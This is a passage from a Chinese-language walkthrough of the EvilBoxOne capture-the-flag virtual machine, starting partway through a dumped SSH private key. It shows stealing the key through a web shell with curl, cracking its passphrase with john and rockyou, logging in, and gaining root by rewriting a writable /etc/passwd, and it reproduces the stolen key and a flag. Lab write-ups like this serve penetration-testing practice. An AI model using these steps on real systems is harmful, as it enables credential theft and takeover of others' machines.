94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm

VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7

Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P

hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr

Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR

IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R

MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS

62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69

Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8

p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C

pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X

KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa

i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp

4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/

8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==

-----END RSA PRIVATE KEY-----

输出 >>>/home/mowree/.ssh/id_rsa.pub:

输出 >>>/home/mowree/.ssh/ssh_host_dsa_key:

输出 >>>/home/mowree/.ssh/ssh_host_dsa_key.pub:

输出 >>>/home/mowree/.ssh/ssh_host_key:

输出 >>>/home/mowree/.ssh/ssh_host_key.pub:

输出 >>>/home/mowree/.ssh/ssh_host_rsa_key:

输出 >>>/home/mowree/.ssh/ssh_host_rsa_key.pub:

中大奖：

/home/mowree/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne

/home/mowree/.ssh/id_rsa

我们直接抓到 mowree 公钥和私钥信息，我们通过盗窃私钥即可进行攻击

通过此命令组合盗窃 touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa

尝试登录 ssh mowree@192.168.56.117 -i id_rsa

-i 指定登录的验证密钥

┌──(kali㉿kali)-[~/workspace]

└─$ ssh mowree@192.168.56.117 -i id_rsa

The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.

ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.

This key is not known by any other names

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

nter passphrase for key 'id_rsa':

登录后需要密码，我们暂且尝试 john 爆破

首先我们需要将得到的私钥转化为 john 可以理解的格式 /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
爆破 john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt 如果 rockyou.txt 没有，需要解压 rockyou.txt.gz 命令 sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

┌──(kali㉿kali)-[~/workspace]

└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt                                                                          1 ⨯

Using default input encoding: UTF-8

Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes

Cost 2 (iteration count) is 2 for all loaded hashes

Press 'q' or Ctrl-C to abort, almost any other key for status

unicorn          (./id_rsa)

1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn

Use the "--show" option to display all of the cracked passwords reliably

Session completed.

结果为 unicorn

┌──(kali㉿kali)-[~/workspace]

└─$ ssh mowree@192.168.56.117 -i id_rsa

Enter passphrase for key 'id_rsa':

Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

mowree@EvilBoxOne:~$ id

uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

登录成功，我们可以进行下一步

提权

探索一下文件目录，发现第一个 flag

mowree@EvilBoxOne:~$ ls

user.txt

mowree@EvilBoxOne:~$ cat user.txt

56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

当然我们还是需要继续提权获得 root

查看 sudo 相关，发现无果
查看版本，发现内核利用也无果
查看我们具有写权限的隐秘文件是否存在 find / -writable 2>/dev/null | grep 'etc' 一般查看配置文件目录

mowree@EvilBoxOne:~$ find / -writable 2>/dev/null | grep 'etc'

/etc/passwd

又是这个文件 /etc/passwd
这个文件如果有写权限，即可强行篡改用户密码
我们拟定一个密码 123 使用 openssl passwd -1 生成 $1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/

篡改 /etc/passwd

root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash

使用 su root 登录

mowree@EvilBoxOne:~$ su root

Contraseña:

root@EvilBoxOne:/home/mowree# id

uid=0(root) gid=0(root) grupos=0(root)

结果

root@EvilBoxOne:/home/mowree# ls

user.txt

root@EvilBoxOne:/home/mowree# cat user.txt

56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

GAME　OVER